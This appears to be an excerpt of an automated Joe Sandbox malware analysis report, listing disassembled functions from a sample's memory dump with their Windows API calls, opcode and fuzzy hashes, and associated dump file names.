Instruction Fuzzy Hash: CC015E3A100308AED7109F65EC45FAA77B8EF48750F109422FA05E72A1D370A958CBB5

Function 00DC6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00DC6DDF,00000000,00000400), ref: 00DC6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00DC6C95

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8c1af0487d3c5216ebe3f116ba6c67240c9d3cc49a4c83bfd0972cd09478dec1
Instruction ID: 6d13a93fc903fa8a823bd646055a74b3c7e7a792d4f6edb94507e381fc65ee83
Opcode Fuzzy Hash: 8c1af0487d3c5216ebe3f116ba6c67240c9d3cc49a4c83bfd0972cd09478dec1
Instruction Fuzzy Hash: D8D09271248301BAEA110E618E06F2A6B99AF45B51F29C409B695E90E1CA74D424E639

Function 00DF19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DF19EF,?,?,00000008,?,?,00DF168F,00000000), ref: 00DF1C21

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ce5402042a0b0aff5034d0163eae98967fdd979a1e8666648a1fa3075422fce9
Instruction ID: cf837f97838bd6023092726887499ebcbeca2baa313f02e56621c30c635faebf
Opcode Fuzzy Hash: ce5402042a0b0aff5034d0163eae98967fdd979a1e8666648a1fa3075422fce9
Instruction Fuzzy Hash: 41B13B39210609DFD715CF28C48AB65BBE0FF45364F2AC658E999CF2A1C335D992CB50

Function 00DDF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DDF66A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d1a24b4cbaa26c08f968a0c94c86e05f15c7720a27880d2fa20d17ce9c2d87a3
Instruction ID: c09cc5ec65bc9431d45aae25ce4b808c9e2834fa91143106b1268e3b8ea2a0c9
Opcode Fuzzy Hash: d1a24b4cbaa26c08f968a0c94c86e05f15c7720a27880d2fa20d17ce9c2d87a3
Instruction Fuzzy Hash: 995191B1A00609DFDB24CF55E8817AAB7F4FB48315F28857AD402EB361D374AA45CB61

Function 00DCB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00DCB16B

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: d6a18f11a9a4f4686a91d9e5deed9854d8e36886c3e5867e89786f0853a801d4
Instruction ID: 68feea2329af92a3f153e0b2256ad645b1182266bc446212cbf4a4bf03ef7410
Opcode Fuzzy Hash: d6a18f11a9a4f4686a91d9e5deed9854d8e36886c3e5867e89786f0853a801d4
Instruction Fuzzy Hash: 1BF01DB4D003188FDB18CB18EC92AE573B1E748315F64829AD955A3390C770E9C4CE74

Function 00DC40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00DC41BC

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 67085b4b016d0c57a514d61650321c023c9d862867c80e100b7bc301e17f1dc6
Instruction ID: a44f0617b093d66781fccb44e844cd4c47faeee3d8bcbd0cc712fe060455d00c
Opcode Fuzzy Hash: 67085b4b016d0c57a514d61650321c023c9d862867c80e100b7bc301e17f1dc6
Instruction Fuzzy Hash: 21C13676A183818FC354CF29D880A5AFBE1BFC8308F19896DE998D7311D734E945CB96

Function 00DDF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00DDF3A5), ref: 00DDF9DA

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 054252d6a49826b411a810e8e5552ef2a3e8a30d2113189403bd513737793d73
Instruction ID: ec370ecc0a659aaddfb90467e32dfb7ef00ab67518d6de51f1f0b5ce80629746
Opcode Fuzzy Hash: 054252d6a49826b411a810e8e5552ef2a3e8a30d2113189403bd513737793d73
Instruction Fuzzy Hash:

Function 00DEC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00DEC030

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 83f82be1516b7b802153a14e419c8ee2218eaeedecf452de8fe16d22c9e8903f
Instruction ID: 4a2b8964015341a38939bff25f9efb85221fd3fb18e4fb61f2795d32b2aded4e
Opcode Fuzzy Hash: 83f82be1516b7b802153a14e419c8ee2218eaeedecf452de8fe16d22c9e8903f
Instruction Fuzzy Hash: A8A02230203300EFC300CF32AF0CB0C3BE8AB082C030A802EA208C0230EB3080A0EB00

Function 00DD62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 3b122f9e1d68265f69357fa6eb1fc6f82a056618e782eaa53bf94ef8abb41fda
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 7662D7716047859FCB25CF38C8906B9BBE1AF95304F08896FE8DA8B346D734E945CB61

Function 00DD77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: b2436f71d129c26b0adddcc738960ef7cc62daf4a0995c4ee95f6c9b6ca0db07
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: FB62C8716083458FCB15CF2CC8909B9BBE1FF95304F1885AEE89A8B346E730E945DB65

Function 00DCF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: f17525a53824fcca6e85f9ecf9d971fad8739cfb185315c7a8fe17db390029fa
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: AD524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00DD7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d7c29e7e8c5a86a29a48c02bc7c6e4f8978ee5594b5c3df92eda4e3f032ae2
Instruction ID: 9110cba9df58d69021d9bd3579ab409de59bd30b5277d25e802055d02d953e6f
Opcode Fuzzy Hash: e0d7c29e7e8c5a86a29a48c02bc7c6e4f8978ee5594b5c3df92eda4e3f032ae2
Instruction Fuzzy Hash: FE12D3B16087069FC718CF28C890AB9B7E0FF94304F14896EE996C7780E334E995CB55

Function 00DCC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbcbaa07636693c65e2b3ab8ae7ed436c752f46222398b1f33dd252599bf401
Instruction ID: 53b32c373e2980015d0b68483e494c9b775f4dd431dfc2a622c040fa66a88218
Opcode Fuzzy Hash: efbcbaa07636693c65e2b3ab8ae7ed436c752f46222398b1f33dd252599bf401
Instruction Fuzzy Hash: 32F1AF716183028FC714CF28C594A2ABBE1EFC9354F186A2EF6C9D7265DA30D945CF62

Function 00DD6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d16b2fc959e0690b8ccf263090e1f4c0933765113d8afdb278045cb68c015cbf
Instruction ID: f161f5b457a3f3f94ed693892d54714b80c2feee31aef69f43a5aa04ba29e966
Opcode Fuzzy Hash: d16b2fc959e0690b8ccf263090e1f4c0933765113d8afdb278045cb68c015cbf
Instruction Fuzzy Hash: DBD192B16083458FDB14DF28C84475BBBE1EF89308F08456EF9899B342D774E949CBA6

Function 00DCE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d4a7a163c2dca970a816565069b9b3a258ebc2abb66bc87c71f126782687dc
Instruction ID: 5030a5c5c74a8d549f6a3e17d22aca506f6ecdc173604fc1cd84432afe1d3dbe
Opcode Fuzzy Hash: a5d4a7a163c2dca970a816565069b9b3a258ebc2abb66bc87c71f126782687dc
Instruction Fuzzy Hash: 11E149755083908FC304CF69D88096ABFF0AF9A310F45495EF9C4A7352C235EA59DFA2

Function 00DD4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 9870fb2d66fa0349131ee35fef3faa038d23a4a205bc093a5cbab185fb77e6e6
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 789145B020034A9BDB24EF68DC95BBA7BD5EF60304F54092EE59687382DA74A545C372

Function 00DD43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: cb9435c69e8a27fe98b997c90cd6ca8a48c11fea3709ff4e42f55e9c004e67a3
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 538115717043469BDB24DE68D891BBD37D4EF91308F04492FE9C68B382DAB4C9868772

Function 00DE51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdc09a0b5c9bbf0b9c487a4211b15c26ad012f00cfec00a056fae01dcee83db
Instruction ID: 22ba30221de7317afafdd6089c6f701688eec4b556bdf1f22a2ede53cc88f8da
Opcode Fuzzy Hash: dbdc09a0b5c9bbf0b9c487a4211b15c26ad012f00cfec00a056fae01dcee83db
Instruction Fuzzy Hash: 74618A35600FC956CA34B96B78917BE2394EB023CCF5C0519E683DF28ED691DD428339

Function 00DE4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: d1fd52b4d2c1bfa07f72df6ab8b8e3177e510e1a2f54acea298764dc73aa2010
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 9D511220600FC857DB38B92BA556BBF33859F027DCF1C0919F882CB28AC615ED0583B2

Function 00DCEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9414ab6ca1f994ac717a58f4c2fcb06e7820d625c19f7da5d7d427138edf02
Instruction ID: 7e23d8991c1bc4ebd6e9cbadb88ab4a51de05a7f05fa26811fd99bb2c93386fa
Opcode Fuzzy Hash: db9414ab6ca1f994ac717a58f4c2fcb06e7820d625c19f7da5d7d427138edf02
Instruction Fuzzy Hash: F951D6315083D68FC711CF24C140AAEBFE1AE9A714F4D49ADE4D95B243C231DA4ADB72

Function 00DD00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a07e292feb7305c6a186641ed41fb430bb2ad2adfa02a6054bbcb79af0c2d2c
Instruction ID: a26484c69b58d890ef4ee6522f30bb0e917cf2f3a5391277f49cdcf9183af21a
Opcode Fuzzy Hash: 6a07e292feb7305c6a186641ed41fb430bb2ad2adfa02a6054bbcb79af0c2d2c
Instruction Fuzzy Hash: 9551E0B1A087119FC748CF19D88065AF7E1FF88314F058A2EE899E3340D735E959CB9A

